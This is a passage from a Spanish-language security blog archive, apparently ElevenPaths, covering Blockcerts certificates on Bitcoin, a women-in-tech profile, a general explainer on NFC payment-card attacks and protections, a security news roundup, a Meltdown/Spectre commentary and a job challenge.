fichero de configuración como en el del ejemplo estableceremos algunos datos propios del certificado, como el logo, la firma o la dirección pública de Bitcoin que los emitirá: mkZTu3fwXAXW4JUDPFkqqNKMMNvLLJJZmc. Figura 2. Fichero sobre la entidad certificadora. Cert-issuer. En este paso, firmaríamos los certificados y se pushearían a la blockchain de Bitcoin. El fichero de configuración es todavía más sencillo que el anterior. En él tendríamos que añadir las rutas donde se encuentran los certificados generados en el paso anterior aún sin firmar. Además, tendríamos que indicar la ruta al fichero donde tendremos la clave privada de la dirección emisora. Es importante saber que cualquier persona que tuviera acceso a dicha clave podría emitir certificados en nombre de cualquiera. Fichero 3. Fichero de configuración de la aplicación emisora de los certificados que se publicarán en la blockchain de Bitcoin. Cert-verifier. Se trata de una librería en Python que un tercero puede utilizar para verificar si el certificado que ha sido presentado por el alumno, ha sido realmente emitido por la entidad certificadora. Además de encontrarse en Python, también existe una implementación de la librería en Javascript, así como aplicaciones para Android y IOS. Figura 4. Captura sobre la validación de un certificado utilizando un merkle tree. Cert-viewer. Contiene un pequeño servidor web de Flask que presenta una interfaz para realizar la verificación desde el navegador. De esta manera, si el alumno hubiera modificado un solo carácter del certificado de otra persona (incluso aunque fuera para corregir un error ortográfico por ejemplo), la comprobación de la validez del certificado fallaría en el primer paso poniendo sobre aviso a quien lo compruebe. Como se puede observar, la transacción de la cadena de bloques de Bitcoin sobre la que se hace la comprobación tiene el mismo txid para los dos certificados, en nuestro caso: 6091fff8d8d81fcf043242ed24b38133d0e6004c368d9f316d5404eb34cb6394. Así, conseguimos ahorrar de forma efectiva un montón de gastos en concepto de comisiones. Figura 5. Visualización de dos certificados emitidos con Blockcerts desde la interfaz web que facilita cert-viewer. Al margen de utilizar el campo OP_RETURN como hemos visto en este post para anclar la existencia de múltiples certificaciones, hace unos meses, en el blog de ElevenPaths publicamos otro post donde comentábamos que este campo podría utilizarse en el futuro para usos potencialmente maliciosos aprovechando la persistencia de redes como la de Bitcoin. A nosotros se nos ocurrió utilizarlo como C&C, pero seguro que no es la única. ¿Se te ocurre alguna a ti? Félix Brezo Equipo de Innovación y Laboratorio de ElevenPaths @febrezo felix.brezo@11paths.com Yaiza Rubio Equipo de Innovación y Laboratorio de ElevenPaths @yrubiosec yaiza.rubio@11paths.com
15 de enero de 2018
Historias de #MujeresHacker: Marta Pérez, experta en User Research de Telefónica Aura
Esta semana presentamos la historia de Marta Pérez que, como User Researcher en Telefónica Aura, vive con pasión la investigación de usuarios y la gestión de ideas, y su experiencia radica en diseñar nuevos procesos y herramientas para impulsar la innovación, mejorar la calidad de las ideas y ayudar a identificar los nuevos comportamientos y necesidades de los usuarios. Marta Pérez, una de las #MujeresHacker de Telefónica CDO nos cuenta su historia: A mis 31 años he estudiado y trabajado en cinco países diferentes: España, Italia, Estados Unidos, Argentina y Reino Unido además de haber participado en proyectos en México, Polonia, China, etc. Actualmente trabajo como User Researcher en Telefónica Aura, un proyecto enormemente estimulante, que jamás me habría imaginado y que me motiva cada día, un proyecto que me enorgullece por la presencia de tantas compañeras hackers que son modelos a seguir por su inteligencia, su determinación y su brillantez. Cuando alguien me pregunta a qué me dedico, la siguiente pregunta suele ser qué he estudiado, siempre tengo que dar una explicación porque la historia es larga. Mi vida ha dado muchas vueltas hasta llegar a donde estoy ahora y por el camino he aprendido que encontrar la pasión de tu vida, a veces no es algo sencillo, es un viaje a disfrutar, pero donde lo más importante es no dejar de buscar aquello que quieras pasar tu vida haciendo, porque nada es imposible y siempre hay una manera de conseguir lo que te propongas, no importa como haya comenzado tu historia. Desde que era muy pequeñita, la creatividad, el arte y su expresión visual ya eran una parte de mí. Dibujaba sin parar, era tan pequeña que no lo recuerdo, pero llenaba libretas enteras de dibujo en menos de una semana, así que en el momento de elegir una carrera opté por una formación creativa. A los 22 años terminé la carrera de Bellas Artes, pero sentía que me faltaba algo así que estudié un posgrado en publicidad creativa, pero seguía buscando algo más estratégico, así que a los 24 comencé un máster en investigación de diseño y gestión de la innovación y fue entonces cuando saltó la chispa, la innovación, la tecnología, las personas y el futuro por venir me fascinaron enormemente. Me interesó tanto que unos años más tarde decidí que quería investigar y hacer mis propios descubrimientos en el terreno de la innovación y la gestión de ideas (si, lo has leído bien) y a los 29 años terminé un doctorado sobre la gestión de ideas en organizaciones multinacionales. Creo que queda claro que el principio no tiene mucho que ver con el final hasta ahora, pero esa es la búsqueda de una pasión que te motive en tu día a día. Me gustaría que cualquier niña sepa que es capaz de llegar a donde quiera, que no hay que permitir que el mundo te encasille en un lugar, que alguien que comience pintando al óleo o trabajando en una galería de arte puede estar 7 años más tarde haciendo investigación sobre Inteligencia Artificial. Durante los últimos cuatro años he participado como ponente en varias conferencias internacionales como International Conference of Manufacturing Research (2013), DMI: Academic Design Management Conference (2014), International Conference Information Visualisation (2015), Interaction South America Conference (2017) y la Service Design Global Conference (2017). Siempre me ha parecido importante dar visibilidad al trabajo de investigación y los avances en prácticas, teorías, herramientas. A día de hoy, desafortunadamente, todavía es más común que haya ponentes, teóricos y académicos masculinos, y que en cualquier práctica de investigación la presencia femenina sea más escasa, así que cuando estoy allí, siento que cada una de nosotras, las mujeres de la profesión, tenemos que luchar para que eso cambie. La tecnología, la investigación o la academia no son terrenos masculinos, por lo que nosotras tenemos que seguir haciéndonos el hueco que merecemos. Mi mensaje a todas las niñas es que sean lo que quieran ser, y que no permitan que nadie les haga sentir lo contrario. Me gustaría que supieran que ellas tienen el poder de conseguir lo que se propongan, que no hay profesiones masculinas o femeninas, que hay que despojarse de los prejuicios y los estereotipos, de los colores rosa y azul y que lo importante es que encuentren aquello que las haga disfrutar y dar lo mejor de sí mismas cada día. Que luchen por conseguirlo, porque todas las niñas son capaces de hacerlo. Marta Pérez User Researcher Telefónica Aura @Bupili Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica » Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica » Ivonne Pedraza, experta en Seguridad de la Información de Telefónica
12 de enero de 2018
No Fear Credit Card
Tarde o temprano, todos nos acostumbramos a deslizar nuestras tarjetas bancarias por la hendidura de terminales de pago (TPV/Pos), en todo tipo de comercios y locales de ocio. Sin darnos cuenta, hemos sido seducidos por las facilidades que nos brinda la, ya veterana, banda magnética, introducida por las entidades financieras en los años setenta. Tarjeta de crédito con banda magnética Sin embargo, esta facilidad de uso no estaba exenta de riesgos, y junto a su creciente popularidad, también se incrementaron los casos de fraude, ocasionados principalmente por la copia de la información contenida en la banda magnética y posterior clonación de la tarjeta, haciendo uso de la misma suplantando a su legítimo titular. Para contrarrestar las debilidades de la banda magnética, en el año 2000, las entidades financieras y los intermediarios de medios de pago, impulsaron la incorporación a las tarjetas de un “chip” basado en el estándar EMV de interoperabilidad de tarjetas. Esta incrementó notablemente la seguridad en las transacciones, ya que además de no poder ser duplicado, posibilita la autenticación del titular mediante su PIN, tecleado en el momento de realizar cualquier pago. La transición al “chip” se realizó de manera gradual, estuvo coexistiendo con la banda magnética. Durante varios años, se mantuvieron en funcionamiento terminales y tarjetas en formato dual que podían operar tanto con banda magnética como con chip, prevaleciendo este último si estaba disponible por ambas partes. No obstante, la picaresca de los clonadores de tarjetas, o simplemente una mala práctica de los comercios, llevaba a deslizar la banda magnética en primer lugar, antes de introducir la tarjeta para la lectura del chip, prologando así la posibilidad de fraude, tal y como se explica detalladamente en el ElevenPaths Talks sobre “Fraude en Puntos de Venta”. TPV/PoS lector de chip EMV Aunque parece un gesto sencillo, pasar de deslizar la tarjeta a introducirla en el TPV supuso un cambio radical, tanto para los usuarios, como para las infraestructuras que soportan los procesos transaccionales entre los diferentes actores: entidad emisora, entidad receptora e intermediaros del pago. Pero cuando apenas acabábamos de adaptarnos al “chip”, llegó la auténtica revolución, la tecnología NFC. Con esta última no es necesario introducir la tarjeta en el TPV, basta con situarla a una pequeña distancia para que la comunicación se realice de forma inalámbrica, “sin contacto” o “contactless” por su denominación inglés. Tecnología NFC en los medios de pago NFC es una tecnología de comunicación inalámbrica por radio frecuencia análoga a RFID, cuyo protocolo está estandarizado bajo la norma ISO/IEC 14443. Además de las tarjetas bancarias, la tecnología NFC se ha incorporado también en los smartphones de última generación, e incluso las operadoras de telefonía más innovadoras la incluyen en sus SIMs, habilitando así cualquier teléfono móvil como medio de pago. De forma similar a como ocurrió con el chip y la banda magnética, la tecnología NFC cohabita con ambas. A diferencia del chip, que expone visiblemente sus terminales de contacto, el NFC queda oculto en el interior de la tarjeta, por lo que deberemos localizar su logotipo para reconocer una tarjeta capaz de realizar un pago “sin contacto”, con tan solo acercarla a escasos cinco centímetros de un terminal de pago que cuente también con NFC. Logotipo de NFC NFC funciona mediante el acoplamiento inductivo en un campo electromagnético creado entre dos dispositivos dotados de una antena de radiofrecuencia a tal efecto. A través de este acoplamiento se realiza la comunicación de datos bidireccional entre ambos dispositivos, pudiendo efectuarse a diferentes velocidades, 106, 212, 424 ó 848 Kbit/s. De forma similar a otras tecnologías RFID, NFC utiliza la banda ISM de 13.56 MHz, la cual no requiere de una licencia específica, aunque está fuertemente regulada tanto técnicamente, como en sus condiciones de uso. La utilización de las bandas ISM es tratada en este artículo. Tarjetas NFC “Contactless” Las tarjetas NFC incorporan en su interior un transpondedor pasivo, junto con una antena en espiral, capaz de captar la energía proporcionada por un dispositivo lector NFC activo, al mismo tiempo que efectúan la comunicación de datos con el chip EMV. Tarjeta de crédito con chip EMV y antena pasiva NFC Las tarjetas plásticas, al igual que otros dispositivos pasivos conocidos como “antenas”, necesitan obtener energía del campo electromagnético generado por un dispositivo activo, como un lector NFC, el cual actúa como iniciador de la comunicación. Existen también dispositivos NFC activos, los cuales cuentan con una pequeña batería, gracias a la cual pueden generar su propio campo electromagnético sin necesidad de una iniciación externa. Seguridad de las tarjetas NFC Si bien es cierto que el chip EMV proporciona un mayor grado de seguridad, contrariamente a la creencia generalizada, la información que contiene no se almacena cifrada, está en texto claro, y de igual forma se transmite al lector, ya sea a través de los contactos del chip, o por la conexión sin contacto NFC, la cual tampoco incorpora ningún mecanismo de cifrado. Las transacciones de pago si se cifran criptográficamente, por lo que están seguras ante cualquier tipo de intercepción, manipulación o repetición, pero el resto de la información de la tarjeta (número PAN (Primary Access Number), nombre del titular y fecha de caducidad), podrían ser capturados ilícitamente por un dispositivo conocido como scanner. Con estos datos se podrían efectuar compras fraudulentas a través de Internet en comercios online que no requieran introducir como segundo factor de autenticación el código de tres dígitos conocido como CVV, serigrafiado en el reverso de las tarjetas bancarias. Ataque "CIberccartereo" La ausencia de cifrado en la comunicación NFC entre la tarjeta y el lector, es aprovechada para obtener ilícitamente la información almacenada en el chip EMV, mediante la aproximación sigilosa de un lector NFC a la tarjeta NCF de una víctima desprevenida. Este tipo de ataque es relativamente fácil de llevar a cabo, ya que hay disponibles diferentes lectores NFC que se conectan a un computador o Tablet por USB, incluso se pueden encontrar fácilmente lectores NFC autónomos de pequeño tamaño, los cuales permiten acercarse discretamente, a menos de cinco centímetros, de una víctima y leer los datos de su tarjeta NFC. Una excelente demostración de este ataque se llevó a cabo por Renaud Lifchitz durante su ponencia en la conferencia de Seguridad “8.8” en donde llegó a obtener hasta la relación de los pagos realizados, tal y como se muestra a la siguiente imagen. Obtención de datos vía lector NFC en 8.8 2013 Ataque de Relay en NFC El ataque de Relay en NFC, está basado en el ataque conocido como de “hombre en el medio”, o MitM por sus siglas en inglés. Básicamente consiste en que el atacante se intercala entre los dos interlocutores de una conexión NFC, retrasmitiendo los mensajes de una parte a otra, pero capturando toda la información e incluso manipulándola a su antojo. Como se puede apreciar en la siguiente figura, el atacante realiza el ataque de Relay NFC empleando dos smartphones intercomunicados por bluetooth; uno actúa como “ proxy reader” para leer los datos de la tarjeta NFC de la víctima y enviarla al “ proxy toquen”, que a su vez la hace llegar al lector NFC legítimo. En este trayecto, toda la información queda capturada para su posterior utilización fraudulenta. Ataque de Replay en NFC Ataques de malware NFC Las debilidades de la tecnología NFC no han pasado desapercibidas por los desarrolladores de malware, quienes desde hace un tiempo están creando aplicaciones maliciosas, especialmente para dispositivos Android. Estas aplicaciones maliciosas suelen pasar desapercibida. Se camuflan simulando una aplicación legitima conocida, como algún juego de gran popularidad, pero una vez instalada se activa como lector de NFC en modo silencioso, capturando toda la información de cuantas tarjetas encuentre a su alcance. En caso más relevante de este tipo de malware se conoce como Android.Ecardgrabber. ¿Cómo protegerse? Aunque pudiera parecer una broma, la mejor forma de afrontar los ataques de NFC sería evitar que alguien se nos acercase lo suficiente para leer nuestras tarjetas. Podemos encontrar fundas para tarjetas bloqueadoras de NFC y lograr la s eguridad física de nuestras tarjetas. En ElevenPaths las ofrecemos gratuitamente como souvenir, y recientemente hay una gran oferta billeteras anti NFC. Como último recurso, podemos forrar con papel de aluminio la cartera donde transportemos nuestras tarjetas NFC. Protector de tarjetas anti NFC En nuestros teléfonos móviles solo deberíamos activar el NFC cuando vayamos a utilizarlo, y siempre que nuestra entidad financiera o intermediario lo permita, habilitar un segundo factor de autenticación, como el PIN, incluso si las operaciones son de importes reducidos. Encontramos también aplicaciones de pago o monederos móviles, desarrollados por emisores de pagos sin elementos seguros (Host Card Emulation - HCE), que implementan tokens de pago únicos, junto con otras capas de seguridad software, que incrementan la seguridad en las transacciones. Finalmente, debemos proteger la información que almacenamos en nuestros teléfonos móviles con algún software antimalware que deberemos mantener actualizado y estableciendo una contraseña suficiente segura, que evite que el teléfono pueda utilizarse por una persona ajena en caso de pérdida o robo. Lo ideal sería que la industria implementara los protocolos criptográficos adecuados para establecer un canal seguro de comunicación NFC, que proporcione la confidencialidad, integridad y autenticidad apropiada para los datos transferidos entre dispositivos. Mientras tanto, los invito a conocer más sobre los #11PathsTalks y cualquier tema relacionado con la seguridad de la información en nuestra comunidad. Gabriel Bergel CSA - Chief Security Ambassador @gbergel gabriel.bergel@global.11paths.com
10 de enero de 2018
#CyberSecurityPulse: El parcheo de vulnerabilidades de forma transparente también es cosa de todos
El año 2018 ha comenzado con una noticia que ha copado las portadas de medios especializados y generalistas de todo el mundo. Las vulnerabilidades bautizadas como Meltdown y Spectre han puesto sobre la mesa que incluso aspectos que dábamos por consolidados como la arquitectura del hardware que hace funcionar la práctica totalidad de nuestros sistemas es susceptible de tener que ser reinventada. La corrección de este tipo de fallos en el futuro deberá ser puesta a prueba con nuevos diseños que las prevengan, pero hasta que estos nuevos sistemas salgan al mercado se hace necesario encontrar soluciones software de contingencia que mitiguen el problema mientras tanto. Los distintos sistemas operativos han intentado hacer frente a una vulnerabilidad que les era notificada por Intel en primera instancia el 9 de noviembre de 2017. De hecho, las propias pruebas de concepto incluidas en el paper de Meltdown se efectúan sobre Firefox 56, que fue la versión estable vigente hasta la llegada de Firefox Quantum (versión 57) el 14 de noviembre de ese mismo mes. En cualquier caso, esta fecha es importante en tanto en cuanto se ha mantenido como fecha de referencia y, de acuerdo a los responsables de Canonical, empresa responsable del desarrollo y mantenimiento de Ubuntu, el 20 de noviembre se acordó usarla para fijar de forma consensuada el 9 de enero de 2018 como la fecha de publicación de los detalles de la vulnerabilidad por parte de sus descubridores. Este período de «revelación responsable» es habitual en la resolución de vulnerabilidades. Su objetivo es garantizar que los equipos de desarrollo de los productos afectados (en este caso, la práctica totalidad de los sistemas que utilizamos desde Windows hasta MacOS pasando por todo tipo de sistemas basados en Linux o Android) dispongan de un período prudencial para estudiar el problema y desarrollar y probar los parches necesarios. Es cierto que este esquema de funcionamiento sitúa a algunas personas en una posición ventajosa dado que serán informados de la existencia de fallos de seguridad susceptibles de ser explotados antes que nadie. Es un peaje a pagar necesario para garantizar que la identificación de problemas de seguridad es reconocida de forma adecuada y los parches y contramedidas estén disponibles para cuando sea publicada. Por este motivo, la actuación trasparente y diligente de las personas que tienen acceso a esta información es más necesaria y exigible que nunca. Al margen de si los motivos para adelantar la fecha comprometida de publicación están justificados (por ejemplo, se podían haber timestampeado los papers en alguna blockchain pública si la preocupación fuera una pérdida de atribución), tenemos que tener claras nuestras prioridades para evitar que sistemas operativos que llevan dos meses avisados de un fallo de seguridad dejen para el último día la aplicación de las actualizaciones correspondientes porque, por desgracia, puede no haber una segunda oportunidad para proteger nuestros datos y nuestras máquinas. Noticias destacadas Ataques de spear phishing que ya apuntan a los Juegos Olímpicos de Pyeongchang Investigadores de seguridad de McAfee han información que ya se están viendo ataques cuyo impacto son los Juegos Olímpicos de Pyeongchang debido a que organizaciones asociadas al evento habían recibido mensajes de spear phishing. Las campañas comenzaron el pasado 22 de diciembre en donde los atacantes usaron correos falsos que pretendían suplantar al Centro Nacional de Contraterrorismo de Corea del Sur. El análisis reveló que el correo electrónico fue enviado desde una dirección en Singapur y remitió supuestos simulacros antiterroristas en la región donde se está realizando la preparación de los Juegos Olímpicos. Los atacantes trataban de engañar a las víctimas para que abrieran un documento en coreano titulado "Organizado por el Ministerio de Agricultura y Silvicultura y los Juegos Olímpicos de Invierno de Pyeongchang". Más información en McAfee El grupo iraní Infy podría estar focalizado en manifestantes y en sus contactos extranjeros De acuerdo con la empresa de seguridad Palo Alto, un actor estatal llamado Infy se encontraría intensificando sus ataques contra cualquiera que esté en contacto con los manifestantes de Irán. El malware Infy se vió por primera vez en VirusTotal en agosto de 2007, mientras tanto, el dominio C&C utilizado por la muestra más antigua detectada por los expertos se ha asociado con una campaña maliciosa de diciembre de 2004. El malware ha evolucionado a través de los años, cuyos autores lo mejoraron implementando nuevas características tales como el soporte para el navegador web Microsoft Edge que se introdujo en la versión 30. A diferencia de otros actores estatales iraníes que se dirigen a organizaciones extranjeras, el grupo Infy parece encontrarse enfocado en oponentes y disidentes. Más información en Palo Alto Noticias del resto de la semana CoffeeMiner, una PoC para comprometer redes Wi-Fi públicas para minar Un desarrollador llamado Arnau ha publicado una prueba de concepto denominada CoffeeMiner para comprometer redes Wi-Fi públicas para inyectar código que permitiría minar en sesiones de navegación conectadas, un método para monetizar rápidamente los esfuerzos de computación necesarios para minar criptodivisas. Arnau explicó cómo impulsar un ataque Man-In-The-Middle para inyectar código javascript en las páginas html a las que acceden los usuarios conectados. De esta forma, todos los dispositivos conectados a una red WiFi se ven obligados a minar una criptodivisa. Más información en Arnau Code Error crítico en phpMyAdmin que permitiría a atacantes dañar bases de datos Una vulnerabilidad crítica ha sido reportada en phpMyAdmin, una de las aplicaciones más populares para administrar la base de datos MySQL, que podría permitir a los atacantes remotos realizar operaciones peligrosas de bases de datos simplemente engañando a los administradores para que hagan clic en un enlace. Descubierta por un investigador de seguridad indio, Ashutosh Barot, se trataría de una vulnerabilidad cross-site request forgery (CSRF) y afectaría a las versiones 4.7.x de phpMyAdmin (anteriores a la 4.7.7). Más información en The Hacker News Se alerta de un error crítico en dispositivos de almacenamiento 'My Cloud' de Western Digital Investigadores de seguridad han descubierto varias vulnerabilidades graves y backdoor hardcodeado en los dispositivos NAS en My Cloud de Western Digital que podrían permitir a atacantes de forma remota ser root sin restricciones al dispositivo. El dispositivo permite a los usuarios compartir archivos en una red doméstica, pero la función de nube privada también les permite acceder a sus datos desde cualquier lugar en cualquier momento. Más información en Gulftech Otras noticias Cientos de servicios de tracking a través de GPS publican datos de usuario abriendo camino a prácticas delictivas Más información en The Hacker News PyCryptoMiner botnet, una nueva botnet extendida a través de SSH Más información en Security Affairs Un miembro de la banda Lurk admite la creación de WannaCry para agencias de inteligencia Más información en Security Affairs ¡Regístrate a la newsletter!
9 de enero de 2018
Internet se ha roto, otra vez (y III)
Tranquilos, hablamos de Metldown y Spectre pero desde otro punto de vista. Pensábamos que no sería necesario retomar esta serie, pero aquí está de nuevo. Ahondaremos en aspectos menos explorados sobre estos fallos que sacuden de nuevo los cimientos de la seguridad. Vamos a intentar aportar algo nuevo. No es la primera catástrofe en la red. ¿Las ha habido peores? ¿Es realmente una catástrofe, o lo serán sus "daños colaterales"? Otros apocalipsis En general, ya se han dado casos muy similares de catástrofes que afectarían a la red tal y como la conocemos, y de la que se han desprendido titulares dantescos. El primero en llegar a las masas fue el "efecto 2000", que aunque no contó con logotipo oficial desde el principio, sí que disfrutó de una marca propia (Y2K)... pero eran otros tiempos y quedó en una especie de decepción apocalíptica que se sació con mucha literatura y algunos telefilms. Recientemente ya hemos sufrido varias veces fallos muy graves que ponían en jaque la seguridad en la red. Resumimos algunos: El apocalipsis criptográfico de Debian en 2008. Se eliminó en 2006 una línea de código en el paquete OpenSSL que ayudaba a generar la entropía al calcular el par de claves pública y privada. Las claves generadas con él ya no eran realmente fiables o verdaderamente seguras. Kaminsky y los DNS en 2008. Un fallo inherente al protocolo, no un problema de implementación. Dan Kaminsky lo descubrió sin ofrecer detalles. Thomas Dullien se aventuró semanas después a publicar en su blog su particular visión de lo que podía ser el problema y acertó: era posible falsificar (a través del envío continuo de cierto tráfico) las respuestas de los servidores autorizados de un dominio. Diez años después, incluso después de esa catástrofe, DNSSEC sigue siendo "una rareza". Espionaje a "gran escala" con BGP. En agosto también de 2008, se hablaba de nuevo de la mayor vulnerabilidad conocida en Internet. Tony Kapela y Alex Pilosov demostraron una nueva técnica (que se creía teórica) que permitía interceptar el tráfico de Internet a una escala global. Se trataba de un fallo de diseño en el protocolo BGP (Border Gateway Protocol) que permitiría interceptar e incluso modificar todo el tráfico de Internet no cifrado. Heartbleed en 2014. Pues eso. De nuevo, la posibilidad de conocer las claves privadas en servidores expuestos. Además inauguró las vulnerabilidades "de marca" porque el apocalipsis también hay que saber venderlo: se diseñó un logo y una página exclusiva con plantilla que se convertiría en estándar de facto, se reservó un dominio, se orquestó una especie de campaña de comunicación, se colaron exageraciones para dar empaque, se cuidó el "timing"... Abrió el camino a una nueva forma de notificar, comunicar y difundir fallos de seguridad. Aunque curiosamente el efecto técnico a corto fue otro: se puso a prueba el sistema de revocación de certificados y efectivamente, no estuvo a la altura. Pero con perspectiva, hasta el momento parece que nunca se han utilizado ninguna de estas vulnerabilidades como métodos de ataque masivo que colapsen Internet y "la rompan". ¿Han servido estas grandes catástrofes para poner contra las cuerdas a la Red? Tampoco. ¿Alguien se ha beneficiado de ellas? Seguro. Para poner de rodillas a la red, en realidad, se usan otras armas: malware común y sencillo, realizado por atacantes menos sofisticados, como Blaster, Sasser, CodeRed o Slammer que sí que consiguieron un impacto masivo en la Red. Y obviamente, EternalBlue/ Wannacry: ¿Qué decir sobre esto? Tuvo que venir un gusano tradicional a "romper" o al menos poner patas arriba internet. Pero para conseguirlo no fue necesario recurrir a un fallo catastrófico ni catastrofista… sino que incluso resultaba extremadamente similar a la famosa vulnerabilidad en SMB que ya aprovechaba Conficker diez años antes. Entonces... ¿es más o menos grave Meltdown/Spectre que todo esto? Primera versión de la alerta en CERT.org en la que se aconsejaba cambiar el procesador Cuenta con algunos elementos muy interesantes como para suponer una importante innovación. Se trata de un fallo de diseño hardware, y nada menos que en el procesador. Pocas veces habíamos sido testigos de una nota en el CERT.org donde se propusiera tan abiertamente cambiar el hardware. Podíamos mitigar el software, dejar de usarlo, deshabilitar funcionalidad, filtrar el uso… ¿pero proponer la renuncia a al mismísimo corazón de un sistema? Esto se sitúa más allá de lo que habíamos visto en seguridad hasta ahora. Un precedente cercano (salvando todas las distancias) puede ser lo que ocurrió en 1999 también con Intel. La PIC (Electronic Privacy Information Center) comunicó a finales de 1999 a la FTC (Federal Trade Comission) que investigase a Intel por entender que los por entonces nuevos Pentium III atentaban contra la privacidad del usuario. Se supone que debía mejorar la generación de números aleatorios y "fomentar el comercio en internet" pero resultó que PIII lo que generaba era una especie de "super-cookie" que identificaría al usuario (se le llamó PSN, Processor Serial Number) y que podía ser accedido por el navegador. Impensable hoy por hoy, pero planteado abiertamente por Intel en 1999. Aun así, tras la campaña " bigbrotherinside.com", la compañía tuvo que publicar un parche para deshabilitarlo, que resultó a su vez un fiasco y finalmente renunciar a la tecnología. Pero eran otros tiempos. Mozilla dando a entender que el fallo es aprovechable a través de JavaScript Hoy Meltdown/Sprectre supone un fallo complejo del que quizás no haya que temer tanto las consecuencias directas como los fallos colaterales. Parches que existían antes del problema y efectos colaterales Es poco probable que Meltdown se utilice de forma masiva, al menos para conocer o acceder a información "secreta". Quizás, podemos aventurarnos a que los efectos colaterales serán el mayor problema de esta vulnerabilidad. Algunos que se nos ocurren: El primer efecto colateral ha sido tener que deshabilitar por completo una tecnología para "mitigar el fallo". La raíz básica del problema es que permite a un proceso normal ver memoria de kernel a causa del "ansia" del procesador por tomar caminos inexplorados en las ramas de decisión, y poder adelantarse y ver incluso más allá de donde le corresponde. Y esto en cierta manera ya se tenía previsto. Primero por el proyecto KASLR de 2014 que intentaba que se mitigara la posibilidad de filtrar información sobre las direcciones de memoria. Pero tenía sus propios fallos, lo que llevó a desarrollar KAISER y ahora KPTI… curiosamente, estos solucionaban Metldown, aunque todavía no existiera como tal. De hecho, Metldown es una especie de PoC de algo que se conocía de antemano, no solo por los autores de KPTI sino por la propia Joanna Rutkowska. El problema de esta tecnología de mitigación es que tienen un impacto importante en el rendimiento, puesto que se tiene que mapear y desmapear el kernel en userspace al ejecutar cada proceso, lo que en la práctica significa adiós al prefetch. Esto es letal para el rendimiento. La buena noticia es que afecta "solo" a programas que realicen muchas llamadas al kernel (syscalls) y "cuánto" lo hacen, depende también bastante de la propia naturaleza del programa. ¿Los más afectados? Virtualizadores, dockers… y la nube. Amazon y Azure parcheando sistemas como locos durante estos días. Google incluso desarrollando su propia solución para que el impacto en el rendimiento sea cero. Un segundo efecto colateral llegará si se confirma que se puede aprovechar de alguna manera por JavaScript o a través del navegador. Esto permitiría no tanto aprovechar el fallo en sí, sino una fórmula de eludir ASLR, y poder así aprovechar más y mejor las vulnerabilidades de ejecución de código que ya existen y existirán. Aun así, puede ser complicado que los atacantes puedan realizar esto porque por ejemplo Mozilla ya ha publicado que reducirá la precisión de sus sistemas para que no pueda ser aprovechado por JavaScript y poco a poco se encargará de solucionarlo del todo. Chrome ya, en cierta forma, lo tenía previsto a través de su "site isolation" (siempre a la vanguardia en cuanto a sandboxing se refiere) y estaba a punto de ponerlo "en producción". Sobre el resto de navegadores, también pondrán sus propias medidas. Todavía no están claras las consecuencias de Spectre por sí mismo (que afecta no solo a Intel sino a todos los procesadores), y si se avanzará en la forma en la que puede ser aprovechado. Y es que estos fallos en esencia, acentúan el eterno problema de sacrificar rendimiento sin importar la seguridad… Una técnica usada durante 20 años (ejecución especulativa) que resulta que tiene consecuencias en seguridad que pocos habían sido capaces de materializar. Un último efecto colateral pasará por utilizar Meltdown como reclamo, pero no técnicamente sino como "marca" o excusa, dada su gran popularidad incluso entre los no técnicos. Malware que se hará pasar por sistemas de mejora de rendimiento, medidores de impacto de Meltdown, parches infectados, noticias falsas, clickbaits… incluso en Github ya se hacen "bromas" sobre el asunto. Broma (Rickrolling) inocua en Github, pero que podría tener consecuencias funestas Conclusiones Una vulnerabilidad con características únicas, al tratarse de un hardware esencial, difícil de reemplazar, con pocas alternativas, cuya mitigación no es sencilla y con una solución que depende solo del fabricante y pasa por un rediseño hardware que no veremos en breve. Un fallo que se mantendrá a nivel hardware por mucho tiempo con nosotros y otro tanto a nivel software, con lo que no lo veremos "solucionado" por completo hasta dentro de muchos años. Un aspecto positivo es que asistiremos a toda una industria del hardware rediseñando sistemas que deberán incluir la seguridad (la capacidad de aislar incluso más las instrucciones) como prioridad ante el rendimiento, incluso. Un caso de lo más interesante en muchos aspectos por lo que ha supuesto y lo que supondrá. Pero en definitiva, para el usuario final, hoy por hoy y tras tanto revuelo, en el día a día es más práctico que siga preocupándose por el ransomware y los criptominers que por un posible ataque Metldown/Spectre propiamente o por sufrir las consecuencias de una hipotética bajada del rendimiento. Sergio de los Santos Innovación y laboratorio ssantos@11paths.com @ssantosv
8 de enero de 2018
Vente a crear tecnología a la unidad Chief Data Office de Telefónica
¡Hola Hacker! La tecnología está en constante evolución y nosotros con ella. Por eso, desde Telefónica, a través de la unidad de Chief Data Office (CDO) liderada por Chema Alonso, que integra Aura -Inteligencia Cognitiva-, ElevenPaths -Ciberseguridad-, LUCA -Big Data- y la Cuarta Plataforma, buscamos nuevos talentos apasionados por la tecnología aplicada a la inteligencia artificial en entornos de desarrollo Android. Si eres alguien quien tiene el conocimiento, la experiencia y la motivación para cambiar las reglas del juego, la unidad de CDO de Telefónica es tu sitio. ¿Cómo lo haremos? Desde Telefónica hemos decidido hackear los procesos tradicionales de reclutamiento de personal. Por eso, en lugar de valorar tu CV te lanzamos el siguiente reto: Los pasos a seguir son muy sencillos, solo tienes que: 1. Acceder al Google Play store e instalar esta aplicación en tu teléfono 2. Extraer de tu teléfono el APK que te acabas de instalar 3. Resolver el reto de programación que encontrarás en el código fuente Si logras descifrar el desafío correctamente conseguirás tu entrevista presencial con nuestros expertos en las oficinas de Distrito Telefónica, Madrid. ¿Aceptas el reto? ¡Demuéstranos de lo que eres capaz! Síguenos en nuestras redes sociales: @Telefonica, @ElevenPaths y @LUCA_D3.
29 de diciembre de 2017
Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
